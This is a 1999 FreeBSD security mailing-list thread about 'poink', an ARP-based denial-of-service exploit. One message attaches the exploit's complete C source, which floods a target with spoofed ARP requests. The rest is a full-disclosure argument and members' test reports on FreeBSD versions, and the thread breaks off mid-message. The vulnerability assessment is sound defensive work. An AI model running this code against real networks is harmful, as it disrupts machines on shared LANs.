Apr 1999 11:54:21 -0600 (MDT) From: Paul Hart X-Sender: hart@anchovy.orem.iserver.com To: Chris Cc: security@FreeBSD.ORG Subject: Re: poink and freebsd In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 19 Apr 1999, Chris wrote: > id rather not post the source to the list, since this is how exploits > get distributed, and bad things occur. Well, so much for the full-disclosure so many of us value. Is this the same "poink" that was recently posted to Bugtraq? http://geek-girl.com/bugtraq/1999_2/0125.html Without more of a description, how are any of us to know? Paul Hart -- Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 10:58:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from foobar.franken.de (foobar.franken.de [194.94.249.81]) by hub.freebsd.org (Postfix) with ESMTP id 3D10414DC5 for ; Mon, 19 Apr 1999 10:57:12 -0700 (PDT) (envelope-from logix@foobar.franken.de) Received: (from logix@localhost) by foobar.franken.de (8.8.8/8.8.5) id TAA06526; Mon, 19 Apr 1999 19:54:08 +0200 (CEST) Message-ID: <19990419195407.A6439@foobar.franken.de> Date: Mon, 19 Apr 1999 19:54:07 +0200 From: Harold Gutch To: Chris , The Tech-Admin Dude Cc: security@FreeBSD.ORG Subject: Re: poink and freebsd References: Mime-Version: 1.0 Content-Type: multipart/mixed; boundary=xXmbgvnjoT4axfJE X-Mailer: Mutt 0.93.2i In-Reply-To: ; from Chris on Mon, Apr 19, 1999 at 01:10:08PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --xXmbgvnjoT4axfJE Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename=muttIQ6439 On Mon, Apr 19, 1999 at 01:10:08PM -0400, Chris wrote: > jd- > > id rather not post the source to the list, since this is how exploits get > distributed, and bad things occur. i sent email to the security-officer, > and a few people to test it out with their setup.. id rather not > distribute it any further... i hope you understand my reasoning behind it > :/ > > > On Mon, 19 Apr 1999, Robert Watson wrote: > > > > > On Mon, 19 Apr 1999, Chris wrote: > > > > > > > im sure ya'll have heard of poink, an exploit against freebsd/openbsd > > > > machines (these are the boxes i have tested on) it appears to work very > > > > efficiently in killing freebsd 3.1 - freebsd 3.0 machines, against one of > > > > our freebsd 2.2.5 machines, it did bring up the error messages in > > > > /var/log/messages (arp lookups) but didnt kill the machine like the > > > > others... > > > > > > > > im just wondering if there are any patches for this, and i noticed there > > > > is no mention of it on freebsd's website.... > > > > > > Interestingly, I haven't heard about this one, and it doesn't appear to be > > > on rootshell, etc. Chris, the fact that _you_ as somebody outside of the circles close to the original author (which I simply assume) already have it, shows that it already is public. Posting it to this list will distribute it to more people, some of which might use it maliciosly, others though might fix it faster than it would be fixed otherwise. Keeping it secret doesn't help anything, this is similar to proprietary programs/protocols, which in many cases are inferior to open source or open protocols. You should get some information about "full disclosure" and read it. Anyway, I was able to find the source for poink after searching for 5 minutes. As I don't have libnet installed (and I don't plan to install it just to compile poink), I am not able to say anything about what it does - perhaps somebody else can do so. bye, Harold -- Sleep is an abstinence syndrome wich occurs due to lack of caffein. Wed Mar 4 04:53:33 CET 1998 #unix, ircnet --xXmbgvnjoT4axfJE Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="poink.c" /* * $Id$ * * poink.c - NT/9x DOS attack * * Code: * Copyright (c) 1999 Mike D. Schiffman * route|daemon9 * All rights reserved. * * Original Idea: * Joel Jacobson (joel@mobila.cx) * * This simple exploit was written as per the specification from Joel * Jacobson's bugtraq post (http://geek-girl.com/bugtraq/1999_1/1299.html). * * Needs libnet 0.99. * Currently: http://lazy.accessus.net/~route/libnet * Soon: http://www.packetfactory.net/ * * gcc poink.c -o poink -lnet * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * */ #include u_char enet_src[6] = {0x00, 0x0d, 0x0e, 0x0a, 0x0d, 0x00}; u_char enet_dst[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff}; int send_arp(struct link_int *, u_long, u_char *); void usage(u_char *); int main(int argc, char *argv[]) { int c, amount; char errbuf[256]; char *device = NULL; struct link_int *l; u_long ip; amount = 20; while ((c = getopt(argc, argv, "n:i:")) != EOF) { switch (c) { case 'i': device = optarg; break; case 'n': amount = atoi(optarg); break; default: exit(EXIT_FAILURE); } } if (!device) { usage(argv[0]); exit(EXIT_FAILURE); } if (argc <= optind) { usage(argv[0]); exit(EXIT_FAILURE); } else if ((ip = libnet_name_resolve(argv[optind], 1)) == -1) { fprintf(stderr, "Cannot resolve IP address\n"); exit(EXIT_FAILURE); } l = libnet_open_link_interface(device, errbuf); if (!l) { fprintf(stderr, "libnet_open_link_interface: %s\n", errbuf); exit(EXIT_FAILURE); } while (amount--) { c = send_arp(l, ip, device); if (c == -1) { /* bail on the first error */ break; } } printf("\n"); return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS); } int send_arp(struct link_int *l, u_long ip, u_char *device) { int n; u_char *buf; if (libnet_init_packet(ARP_H + ETH_H, &buf) == -1) { perror("libnet_init_packet memory:"); exit(EXIT_FAILURE); } /* * Ethernet header */ libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_ARP, NULL, 0, buf); /* * ARP header */ libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, 6, 4, ARPOP_REQUEST, enet_src, (u_char *)&ip, enet_dst, (u_char *)&ip, NULL, 0, buf + ETH_H); n = libnet_write_link_layer(l, device, buf, ARP_H + ETH_H); fprintf(stderr, "."); libnet_destroy_packet(&buf); return (n); } void usage(u_char *name) { fprintf(stderr, "%s -i interface [-n amount] ip\n", name); } --xXmbgvnjoT4axfJE-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 11: 1:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from hiway1.exit109.com (hiway1.exit109.com [208.225.64.3]) by hub.freebsd.org (Postfix) with ESMTP id 78B2B15773 for ; Mon, 19 Apr 1999 11:00:49 -0700 (PDT) (envelope-from freebsd@hiway1.exit109.com) Received: from localhost (freebsd@localhost) by hiway1.exit109.com (8.9.3/8.7.3) with SMTP id NAA21153; Mon, 19 Apr 1999 13:58:23 -0400 (EDT) Date: Mon, 19 Apr 1999 13:58:23 -0400 (EDT) From: Chris To: Paul Hart Cc: security@FreeBSD.ORG Subject: Re: poink and freebsd In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org last time i saw someone post the source to a recent exploit to this list, you all attacked him, told him he was "stupid" for posting the source to a public forum such as this... so i guess, your damned if you do and your damned if you dont? is that the way it works? -Chris On Mon, 19 Apr 1999, Paul Hart wrote: > On Mon, 19 Apr 1999, Chris wrote: > > > id rather not post the source to the list, since this is how exploits > > get distributed, and bad things occur. > > Well, so much for the full-disclosure so many of us value. Is this the > same "poink" that was recently posted to Bugtraq? > > http://geek-girl.com/bugtraq/1999_2/0125.html > > Without more of a description, how are any of us to know? > > Paul Hart > > -- > Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. > hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 11: 4:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from vtopus.cs.vt.edu (vtopus.cs.vt.edu [128.173.40.24]) by hub.freebsd.org (Postfix) with ESMTP id D9A2B14C8E for ; Mon, 19 Apr 1999 11:04:10 -0700 (PDT) (envelope-from dhagan@vtopus.cs.vt.edu) Received: (from dhagan@localhost) by vtopus.cs.vt.edu (8.9.1a/8.9.1) id OAA25243 for security@freebsd.org; Mon, 19 Apr 1999 14:01:41 -0400 (EDT) Date: Mon, 19 Apr 1999 14:01:40 -0400 (EDT) From: Daniel Hagan To: security@freebsd.org Subject: poink attack (was Re: ARP problem in Windows9X/NT) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I don't have time to find the archive URL for this post right now, but this should give people something to work with. The header to the code has a URL reference to another (originating ?) article. Daniel -- Daniel Hagan Computer Systems Engineer dhagan@cs.vt.edu ---------- Forwarded message ---------- Date: Tue, 13 Apr 1999 11:25:34 -0700 From: route@RESENTMENT.INFONEXUS.COM To: BUGTRAQ@NETSPACE.ORG Subject: Re: ARP problem in Windows9X/NT [kay wrote] | | Could you be more specific with those XX-fields ? The source ethernet address appears to be arbitrary. The destination ethernet address needs to be either the address of the target host, or a broadcast address. | I started writing that proggie with plain syscalls, but it would only run | on Linux, so I modified one of the examples in Route's Libnet 0.9 to do | the stuff. I haven't tested it yes since I don't have LAN at home... Didn't test your code. Rolled my from the same libnet example, and it does work against NT and 95/98. | For those who are still wondering what the hell Libnet is: check out | http://www.infonexus.com/~demon9 My site has moved temporarily to http://lazy.accessus.net/~route. Libnet is hosted there for the time being (http://lazy.accessus.net/~route/Libnet) but will move to http://www.packetfactory.net when I get that site up. For those of you who don't know, Libnet is a library for portable injection. It is the `libpwrite` analog to libpcap. I suppose this is as good a time as any to announce the release of version 0.99 which adds a lot of new functionality and fixes a few bugs. Oh yah. Here's poink. Poink-poink! /* * $Id$ * * poink.c - NT/9x DOS attack * * Code: * Copyright (c) 1999 Mike D. Schiffman * route|daemon9 * All rights reserved. * * Original Idea: * Joel Jacobson (joel@mobila.cx) * * This simple exploit was written as per the specification from Joel * Jacobson's bugtraq post (http://geek-girl.com/bugtraq/1999_1/1299.html). * * Needs libnet 0.99. * Currently: http://lazy.accessus.net/~route/libnet * Soon: http://www.packetfactory.net/ * * gcc poink.c -o poink -lnet * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * */ [ Source program cut, see geek-girl.com for archive ] -- I live a world of paradox... My willingness to destroy is your chance for improvement, my hate is your faith -- my failure is your victory, a victory that won't last. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 11:18:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from weathership.homeport.org (weathership.homeport.org [207.31.235.99]) by hub.freebsd.org (Postfix) with ESMTP id 94CAF14C34 for ; Mon, 19 Apr 1999 11:18:12 -0700 (PDT) (envelope-from adam@weathership.homeport.org) Received: (from adam@localhost) by weathership.homeport.org (8.8.8/8.8.5) id OAA18048; Mon, 19 Apr 1999 14:40:59 -0400 (EDT) Date: Mon, 19 Apr 1999 14:40:59 -0400 From: Adam Shostack To: Chris Cc: Paul Hart , security@FreeBSD.ORG Subject: Re: poink and freebsd Message-ID: <19990419144059.A17993@weathership.homeport.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: ; from Chris on Mon, Apr 19, 1999 at 01:58:23PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org While full-dscoluse flame wars are fun, and I'd hate to distract people from that, I am curious if anyone has verified FreeBSD's vulnerability (or lack thereof) to this? All my boxes are in production use, and I don't have crashable targets to test right now. It would be nice to see a statement from someone who knows about the status of -CURRENT, -RELEASE, and if we've invulnerable, if any of the relevant code has been changed in the memorable past. Adam On Mon, Apr 19, 1999 at 01:58:23PM -0400, Chris wrote: | last time i saw someone post the source to a recent exploit to this list, | you all attacked him, told him he was "stupid" for posting the source to a | public forum such as this... | | so i guess, your damned if you do and your damned if you dont? is that the | way it works? | | -Chris | | On Mon, 19 Apr 1999, Paul Hart wrote: | | > On Mon, 19 Apr 1999, Chris wrote: | > | > > id rather not post the source to the list, since this is how exploits | > > get distributed, and bad things occur. | > | > Well, so much for the full-disclosure so many of us value. Is this the | > same "poink" that was recently posted to Bugtraq? | > | > http://geek-girl.com/bugtraq/1999_2/0125.html | > | > Without more of a description, how are any of us to know? | > | > Paul Hart | > | > -- | > Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. | > hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ | > | | | | To Unsubscribe: send mail to majordomo@FreeBSD.org | with "unsubscribe freebsd-security" in the body of the message -- "It is seldom that liberty of any kind is lost all at once." -Hume To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 11:27:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id 6A70714C34 for ; Mon, 19 Apr 1999 11:27:27 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id UAA04989; Mon, 19 Apr 1999 20:24:59 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.2/8.9.2) with ESMTP id UAA19225; Mon, 19 Apr 1999 20:24:52 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Paul Hart Cc: Chris , security@FreeBSD.ORG Subject: Re: poink and freebsd In-reply-to: Your message of "Mon, 19 Apr 1999 11:54:21 MDT." Date: Mon, 19 Apr 1999 20:24:52 +0200 Message-ID: <19223.924546292@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , Paul Hart writes: >On Mon, 19 Apr 1999, Chris wrote: > >> id rather not post the source to the list, since this is how exploits >> get distributed, and bad things occur. > >Well, so much for the full-disclosure so many of us value. Is this the >same "poink" that was recently posted to Bugtraq? It sounds like, which means you have to be on same ethernet and what it does is make it look like another machine is configured with same IP. Not a big threat for most people. -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 11:28:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from kinetic.tiora.net (kinetic.tiora.net [206.251.130.15]) by hub.freebsd.org (Postfix) with ESMTP id 3BC541523C for ; Mon, 19 Apr 1999 11:28:21 -0700 (PDT) (envelope-from liam@kinetic.tiora.net) Received: from localhost (liam@localhost) by kinetic.tiora.net (8.9.3/8.9.3) with ESMTP id LAA00011 for ; Mon, 19 Apr 1999 11:24:59 -0700 (PDT) Date: Mon, 19 Apr 1999 11:24:59 -0700 (PDT) From: Liam Slusser To: security@FreeBSD.ORG Subject: Re: poink attack (was Re: ARP problem in Windows9X/NT) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In a earlier email Chris said his fbsd 3.x was affected...and also said arp errors in /var/log/messages in 2.2.5....but this looks like a WinNT/9x DoS from the geek-girl report here. Is fbsd affected..and if so..what versions? Thanks! ;) liam System Administrator Tiora Networks | www.tiora.net <---- tiora's webpage www.tiora.net/~liam <----- homepage | liam@tiora.net <-- my email address Lowered turbo powered Honda Civic's are really cool. <---------- my quote On Mon, 19 Apr 1999, Daniel Hagan wrote: > I don't have time to find the archive URL for this post right now, but > this should give people something to work with. The header to the code > has a URL reference to another (originating ?) article. > > Daniel > > -- > Daniel Hagan > Computer Systems Engineer > dhagan@cs.vt.edu > > ---------- Forwarded message ---------- > Date: Tue, 13 Apr 1999 11:25:34 -0700 > From: route@RESENTMENT.INFONEXUS.COM > To: BUGTRAQ@NETSPACE.ORG > Subject: Re: ARP problem in Windows9X/NT > > [kay wrote] > | > | Could you be more specific with those XX-fields ? > > The source ethernet address appears to be arbitrary. The destination > ethernet address needs to be either the address of the target host, or > a broadcast address. > > | I started writing that proggie with plain syscalls, but it would only run > | on Linux, so I modified one of the examples in Route's Libnet 0.9 to do > | the stuff. I haven't tested it yes since I don't have LAN at home... > > Didn't test your code. Rolled my from the same libnet example, and it > does work against NT and 95/98. > > | For those who are still wondering what the hell Libnet is: check out > | http://www.infonexus.com/~demon9 > > My site has moved temporarily to http://lazy.accessus.net/~route. > Libnet is hosted there for the time being > (http://lazy.accessus.net/~route/Libnet) but will move to > http://www.packetfactory.net when I get that site up. > > For those of you who don't know, Libnet is a library for portable > injection. It is the `libpwrite` analog to libpcap. I suppose this is > as good a time as any to announce the release of version 0.99 which adds > a lot of new functionality and fixes a few bugs. > > Oh yah. Here's poink. Poink-poink! > > /* > * $Id$ > * > * poink.c - NT/9x DOS attack > * > * Code: > * Copyright (c) 1999 Mike D. Schiffman > * route|daemon9 > * All rights reserved. > * > * Original Idea: > * Joel Jacobson (joel@mobila.cx) > * > * This simple exploit was written as per the specification from Joel > * Jacobson's bugtraq post (http://geek-girl.com/bugtraq/1999_1/1299.html). > * > * Needs libnet 0.99. > * Currently: http://lazy.accessus.net/~route/libnet > * Soon: http://www.packetfactory.net/ > * > * gcc poink.c -o poink -lnet > * > * Redistribution and use in source and binary forms, with or without > * modification, are permitted provided that the following conditions > * are met: > * 1. Redistributions of source code must retain the above copyright > * notice, this list of conditions and the following disclaimer. > * 2. Redistributions in binary form must reproduce the above copyright > * notice, this list of conditions and the following disclaimer in the > * documentation and/or other materials provided with the distribution. > * > * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND > * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE > * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE > * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE > * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL > * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS > * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) > * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT > * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY > * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF > * SUCH DAMAGE. > * > */ > > [ Source program cut, see geek-girl.com for archive ] > > -- > I live a world of paradox... My willingness to destroy is your chance for > improvement, my hate is your faith -- my failure is your victory, a victory > that won't last. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 11:42:14 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 32E7B14F47 for ; Mon, 19 Apr 1999 11:42:06 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id OAA15783; Mon, 19 Apr 1999 14:35:25 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Mon, 19 Apr 1999 14:35:24 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Poul-Henning Kamp Cc: Paul Hart , Chris , security@FreeBSD.ORG Subject: Re: poink and freebsd In-Reply-To: <19223.924546292@critter.freebsd.dk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 19 Apr 1999, Poul-Henning Kamp wrote: > In message , Paul Hart writes: > >On Mon, 19 Apr 1999, Chris wrote: > > > >> id rather not post the source to the list, since this is how exploits > >> get distributed, and bad things occur. > > > >Well, so much for the full-disclosure so many of us value. Is this the > >same "poink" that was recently posted to Bugtraq? > > It sounds like, which means you have to be on same ethernet and what it > does is make it look like another machine is configured with same IP. > > Not a big threat for most people. His report suggests it does nasty things to -STABLE and -CURRENT, although off hand my response on seeing the bugtraq posting was exactly the same: arp is arp is arp is not so very evil. However, I have not tested it, and we've had one positive report of pain resulting from poink. I did not realize it was the same poink as the bugtraq one, as I had already dismissed it as "unlikely". The threat that did come to mind is the kernel message thing: syslogd appears to fsync the log after each message coming from the kernel. If someone can generate sufficient log messages, they can seriously consume disk i/o bandwidth. I discovered this the hard way when I stuck a bit too much debugging code into my tokens module. :) Now I just kill syslogd before doing anything resulting in a lot of kernel output. Since arp announcements do come from the kernel, I suspect lots could cause pain. But I would hope it wouldn't crash the machine. Anyhow, my crash boxes are all tied up right now (being crashed by other code, that is) so maybe someone out there could verify this? Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 11:56:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 38EAF15711 for ; Mon, 19 Apr 1999 11:56:34 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from zippy.cdrom.com (localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id LAA06070; Mon, 19 Apr 1999 11:53:44 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: Chris Cc: Paul Hart , security@FreeBSD.ORG Subject: Re: poink and freebsd In-reply-to: Your message of "Mon, 19 Apr 1999 13:58:23 EDT." Date: Mon, 19 Apr 1999 11:53:44 -0700 Message-ID: <6068.924548024@zippy.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > so i guess, your damned if you do and your damned if you dont? is that the > way it works? In this area of endeavor? You bet! That's exactly the way it works. :-) - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 11:56:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from mozart.csl.cornell.edu (MOZART.CSL.CORNELL.EDU [132.236.71.20]) by hub.freebsd.org (Postfix) with ESMTP id 84B6E155C4 for ; Mon, 19 Apr 1999 11:56:44 -0700 (PDT) (envelope-from rajit@csl.cornell.edu) Received: from mozart.csl.cornell.edu (localhost [127.0.0.1]) by mozart.csl.cornell.edu (8.9.3/8.9.2) with ESMTP id OAA02778 for ; Mon, 19 Apr 1999 14:54:18 -0400 (EDT) (envelope-from rajit@mozart.csl.cornell.edu) Message-Id: <199904191854.OAA02778@mozart.csl.cornell.edu> To: security@FreeBSD.ORG Subject: Re: poink and freebsd In-reply-to: Your message of "Mon, 19 Apr 1999 11:54:21 MDT." Date: Mon, 19 Apr 1999 14:54:18 -0400 From: Rajit Manohar Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi all, I just tested poink on FreeBSD 3.1-RELEASE, and the machine has a minor problem and then recovers. As people pointed out, arp is arp and it really shouldn't hose systems much. I haven't tried out extensive tests yet... maybe later in the evening when I have more time. :) Here's my log file: Apr 19 14:39:32 /kernel: arp: is using my IP address ! Apr 19 14:39:32 last message repeated 16 times Apr 19 14:39:32 /kernel: Apr 19 14:39:32 /kernel: arp: is using my IP address ! Apr 19 14:39:32 last message repeated 2 times ( -> your machine, -> your ethernet addr, -> your ip addr :) ) The next thing that happened was that ypbind complained for a bit (NIS server not responding) and amd was unhappy. The machine always responded to pings, but my home directory disappeared temporarily. In about a minute, everything returned to normal (AFAIK). I'd guess that a repeated-poink, or a poink of an nfs server would be a more serious problem. -Rajit To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 11:59:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from speed.matrix.com.br (speed.matrix.com.br [200.202.17.241]) by hub.freebsd.org (Postfix) with ESMTP id CED7F155DB for ; Mon, 19 Apr 1999 11:59:05 -0700 (PDT) (envelope-from camposr@MATRIX.COM.BR) Received: from localhost (speed@localhost) by speed.matrix.com.br (8.9.3/8.9.3) with ESMTP id PAA09931; Mon, 19 Apr 1999 15:54:40 -0300 (EST) X-Authentication-Warning: speed.matrix.com.br: speed owned process doing -bs Date: Mon, 19 Apr 1999 15:54:40 -0300 (EST) From: Rodrigo Campos X-Sender: speed@speed.matrix.com.br To: Liam Slusser Cc: security@FreeBSD.ORG Subject: Re: poink attack (was Re: ARP problem in Windows9X/NT) In-Reply-To: Message-ID: Organization: Matrix Network MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 19 Apr 1999, Liam Slusser wrote: > > In a earlier email Chris > said his fbsd 3.x was affected...and also said arp errors in > /var/log/messages in 2.2.5....but this looks like a WinNT/9x DoS from > the geek-girl report here. Is fbsd affected..and if so..what versions? > Thanks! ;) > I tested it against freebsd 2.2.8 stable, 3.0 stable and 3.1 stable, all they are vulnerable, it's not a big threat anyway, as you have to be on the same ethernet to use the exploit. Regards, -- ________________________ Rodrigo Albani de Campos Matrix Internet - NOC - Be a "Glad I Did" instead of a "Wish I Had" - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 12:11:30 1999 Delivered-To: freebsd-security@freebsd.org Received: from hiway1.exit109.com (hiway1.exit109.com [208.225.64.3]) by hub.freebsd.org (Postfix) with ESMTP id 20083155B8 for ; Mon, 19 Apr 1999 12:11:27 -0700 (PDT) (envelope-from freebsd@hiway1.exit109.com) Received: from localhost (freebsd@localhost) by hiway1.exit109.com (8.9.3/8.7.3) with SMTP id PAA06590; Mon, 19 Apr 1999 15:08:58 -0400 (EDT) Date: Mon, 19 Apr 1999 15:08:58 -0400 (EDT) From: Chris To: Rajit Manohar Cc: security@FreeBSD.ORG Subject: Re: poink and freebsd In-Reply-To: <199904191854.OAA02778@mozart.csl.cornell.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org rajit- so, if you setup a timer to execute the poink sploit on the box every, 